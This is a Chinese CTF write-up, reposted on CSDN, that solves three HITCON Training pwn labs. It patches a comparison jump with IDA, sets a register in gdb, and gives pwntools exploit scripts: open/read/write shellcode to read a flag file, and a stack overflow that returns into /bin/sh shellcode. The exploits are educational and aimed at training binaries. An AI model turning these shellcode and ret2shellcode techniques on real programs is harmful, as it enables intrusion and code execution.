Pwn-10月23-Hitcon(一)

最新推荐文章于 2024-08-06 04:05:55 发布
最新推荐文章于 2024-08-06 04:05:55 发布
阅读量158 收藏
点赞数
文章标签: 操作系统 数据结构与算法 python
原文链接:http://www.cnblogs.com/yof3ng/p/9840165.html
版权
本文深入解析Hitcon CTF中Pwn挑战的三道题解,涵盖sysmagic、orw及ret2sc,详述利用patch、gdb、shellcode及ROPchain技巧,展示如何绕过安全保护,构造并执行恶意代码获取flag。
摘要由CSDN通过智能技术生成

目录

欢迎前往个人主页享受更为优质的体验。

Pwn-10月23-Hitcon(一)

继续二进制修炼,今天开始肝Hiton-training,膜着m4x,以及另一位大佬23R3F的题解蹒跚前行。

lab1-sysmagic

貌似第一题会比较简单,先用IDA-Pro静态分析一下:

5bcf0b64c261c.png

貌似直接得到了一个能够输出flag的函数?由于这是个elf32位可执行文件所以我们需要在linux下面执行:

5bcf0332abc98.png

可以很简单就看懂逻辑,输入一个值,然后比较如果相等,得出flag。

解法1 - patch

IDA Pro -- keypatch,使用keypatch插件来修改汇编代码,我们可以直接将关键的一步nop掉或者改成完全相反的操作。

5bcf05f6b8d06.png

例如将.text:08048722的跳转汇编指令改为jmp无条件跳转,或者是与jnz相反的jz操作。

5bcf075963ea4.png

5bcf07b5548dc.png

修改为无条件跳转后需要将其保存到对应文件中:
5bcf07f4c58d9.png

然后去把文件挪到linux上运行试试发现并没有用,因为改为jmp后其函数直接少了一部分对flag的操作:

5bcf0a2f45481.png

所以我们只能将原样本中的jnz改为jz了,改完之后函数已经成为不等则输出flag了:

5bcf0bd4dce1d.png

运行效果:

5bcf0c1461b1f.png

解法2 - gdb set register value

通过gdb动态调试,并且在即将进行比较前,将 eax置为与edx相同的值即可:

5bcf0e78806d2.png

然后即可得到flag。

lab2-orw

检查保护措施

checksec orw.bin,题目orw的意思是open,read,write这三个函数。

5bcf0fca60256.png

emmm这是我做的第一个开启了Stack保护的题目呢。

逻辑分析

简单跑一下可以看到直接是让你输入shellcode:
5bcf104eea350.png

放IDA pro里面看看:

5bcf15e2dd0aa.png

细看一下orw_seccomp()函数:

5bcf16ed762fb.png

prctl函数又是啥玩意儿?Prctl(用户和内核沟通的一个绝佳函数),这个函数可以对进程进行一些设置。而有一道强网杯题目就好像用了这玩意儿的技术?

输入shellcode之后应该会执行,所以这题的目的是让我们自己构造shellcode去读取flag?既然要构造shellcode,那就需要用到pwntools的asm模块和shellcraft模块:

asm模块是将操作转换为汇编命令,而shellcraft是具有各种函数对应汇编命令的一个模块,十分好用:

5bcf1996469a4.png

pwntools中的context模块又是用来干嘛的呢?

context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。

例如context(os='linux', arch='amd64', log_level='debug')

这句话的意思是:

  1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
  2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
  3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。

exp

根据题意和题解?(正处于涨姿势的时候)写出exp:


#!/usr/bin/env python
#coding:utf-8

from pwn import *
from pwn import shellcraft as sc
context.log_level = "debug"

shellcode = sc.pushstr("/home/xiaoyifeng/ctf/pwn/Hiton/lab2/flag")
shellcode += sc.open("esp")
#  open返回的文件文件描述符存贮在eax寄存器里 
shellcode += sc.read("eax", "esp", 0x100)
#  open读取的内容放在栈顶 
#  write函数在栈顶读取0x100大小的内容并打印出来
shellcode += sc.write(1, "esp", 0x100)

io = process("./orw.bin")
#print(asm(shellcode))
io.sendlineafter("shellcode:", asm(shellcode))
print io.recvall()
io.close()

运行效果:

5bcf2cbec3db2.png

lab3-ret2sc

题目名是return to shellcode的简写,应该是利用return返回然后执行shellcode之类的操作?

检查保护措施

checksec ret2sc

5bcf21774fa88.png

emmm没有开启啥保护,没有开启栈溢出检测,也没有开启栈不可执行(NX)。

逻辑分析

跑一下发现让我们输入字符串到Name里面,还有一个try your best?首先想到的是会不会又是啥栈溢出什么的。

5bcf212fdd23f.png

嗯,情况是有的:

5bcf22016964b.png

通过gdb动态调试可以发现在输入try your best 的值的时候可以发生溢出,并且将EIP指向我们构造的位置:

5bcf25189cf77.png

而这个临界值我们可以通过pattern search来查我们构造的pattern偏移量,得到为32。根据大佬的题解了解到return to shellcode是一种题型,我甚至想到了又用ROP chain???黑人问号.jpg?。

原来return to shellcode的操作就是将shellcode写入name变量空间,然后通过返回到该地址从而执行shellcode(NX未开启,栈可执行)

5bcf2a86e5630.png

该变量地址为0x804A060

构造EXP

这个exp需要用到shellcraft和asm,来将shellcode转为汇编指令:

#!/usr/bin/env python
#coding:utf-8

from pwn import *
context(os = "linux", arch = "i386",log_level="debug")

io = process("./ret2sc")

#获得sh的命令多种多样,并且有不同系统版本的sh
#shellcode = asm(shellcraft.execve("/bin/sh"))
shellcode = asm(shellcraft.i386.linux.sh())
io.sendlineafter(":", shellcode)

#flat模块能将pattern字符串和地址结合并且转为字节模式
payload = flat(cyclic(32), 0x804a060)
io.sendlineafter(":", payload)

io.interactive()
io.close()

运行效果:

5bcf2c13d7442.png

小结

内容涉及 context 模式设置,asm模块,shellcraft模块,patch操作,return to shellcode题型,pwntools flat模块。

今天先混到这儿。。。我真菜?。

转载于:https://www.cnblogs.com/yof3ng/p/9840165.html

HITCON Training Lab3 Writeup
博客
06-29 164
首先看一下文件的基本属性: $ file ./ret2sc ./ret2sc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=31484b774646e78186848556eae669af027787ce, not stripped 利用checksec查看
【逆向学习记录】Pwntool常用的数据处理方式
卦星的专栏
05-26 4417
1 概述 偶尔在pwn的题目中,使用pwntool工具,由于不熟练,经常性遗忘,尤其是接收地址的时候,会卡在数据处理上,因此单独起一篇文章,用来记录日常用到的各种问题。 参考文章: PwnTools常见用法 Pwntool 官方文档 2 数据处理方式 2.1 发送数据 send(payload) 发送payload sendline(payload) 发送payload,并进行换行(末尾\n) s...
HIT 软件构造 lab3 感想与收获
miraclexw的博客
07-06 89
lab3我选择的方案5,写了三个接口及其实现,为三个app委派使用,在这里我发现了委派调用的好处。 首先,更改容易,当发现现有的接口实现不能满足app要求时,可以直接写另一个实现来继承这个接口,在app中,调用时,只需指明调用的是哪一个实现就完成了更改。 第二,一开始我认为如果没有使用委派,顶多就是在app中多复制粘贴几下的问题就是了,后来发现不是这样,这就要涉及到另一个东西泛型L,这是一个抽象的对象,通过它,代码就可以提高复用度。举个例子: @Over...
Pwn patch用法
Helloity的博客
07-27 778
IDA Patch使用
pwn栈溢出2
Innocence_0的博客
11-03 89
(英语:Return-Oriented Programming,缩写:ROP)是计算机安全中的一种,该技术允许攻击者在程序启用了安全保护技术(如堆栈不可执行)的情况下控制程序执行流,执行恶意代码。其核心思想是通过栈溢出等方式控制堆栈调用,以劫持程序控制流并执行针对性的机器语言指令序列(称为所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。F5反汇编checksec 查看信息计算padding查找gadgets。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
现在,到2020年,您将拥有一个更高效的pwn开发环境。 您可以在上面的GIF中瞥一眼最终环境。 在本文中,我将向您展示如何构建该环境。 Arch Linux 如果您想拥有一个ELF ,首先需要一个Linux发行版。 我使用 ,该...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 501
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面中,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
使用GDB查看和修改寄存器的值
热门推荐
weixin_44395686的博客
03-08 2万+
gdb查看,修改CPU中寄存器的值 打印寄存器的值 debug的时候,如果想查看register中的内容,可以使用"i register"命令,i是info命令的缩写,表示列出寄存器的信息。 (gdb) i registers rax 0x7ffff7dd9f60 140737351884640 rbx 0x0 0 rcx ...
CTFWIKI-PWN-ret2libc
m0_64180167的博客
04-20 1155
一遍我们只能找到got表的泄露 我们要写入的话就要重新执行一下 所以等等通过把start的地址存入返回地址 让程序执行两次。puts函数的真实地址 和 通过LibcSearcher工具得到的偏移量 就可以计算出每个函数的基地址。这里有一个问题 为什么我们需要找到开始的地址 _start表示程序开始的地址。如果我们无法找到system的plt地址 那我们就无法调用system函数。不是地址不会变 是函数和puts真实地址的之间的链接是不会变的。所以我们只要使用puts函数的真实地址 求出他们之间的链接。
pwn学习笔记(8)--初识Pwn沙箱
最新发布
qq_66013948的博客
08-06 1126
​ 沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。​ 安全计算模式seccomp(Secure Computing Mode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和黑名单。seccomp机制用于限制应用程序可以使用的系统调用,增加系统的安全性。​ 在ctf中主要通过两种方
PWN工具介绍
kelxLZ的博客
07-02 1176
Author:ZERO-A-ONE Date:2021-07-02 一、PWNTOOLS 1.1 程序的启动与远程连接 使用process接口启动程序 常用:process(argv,env),例如: process('./demo'):执行可执行文件demo process(['cat','flag]):执行命令cat flag process("./demo",env={'LD_PRELOAD':'./libc.so.6'}):以指定环境变量运行文件 当程序运行于远程时,提供了Host和监.
pwntools所带的函数使用方法
Y_peak的博客
02-25 760
pwntools所带的函数使用方法
PWNTOOLS的基本使用
weixin_62675330的博客
02-11 2244
pwntools的基本使用 首先需要 from pwn import * 把 pwntools 导入进来,它同时会把一些系统库给导入进来 本地打的话 p=process('./filename'),远程的话 p=remote('192.168.1.103',10001) p.close() 关闭 发送 payload p.send(payload) 发送 payload p.sendline(payload) 发送 payload,并进行换行(末尾\n) p.sendafter(some_string,
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3377
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
2018 SUCTF magic
ACdream
06-03 997
当时做题的时候得到的式子:(m[0] & key) % 2 == ?(m[1] & key) % 2 == *其中?和 * 很明显,不是0就是1啊!所以不妨换一种思路,如果我们把m和key都转化为二进制数,会发生什么!M表示m展开后的矩阵,K表示key展开之后的向量,C为cipher.txt转成的01向量,即有:MK = C矩阵乘法!二进制下的!也就是说,在有限域GF(2)中,有已...
pwn(三)
小明的小书包Ya
10-04 2480
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值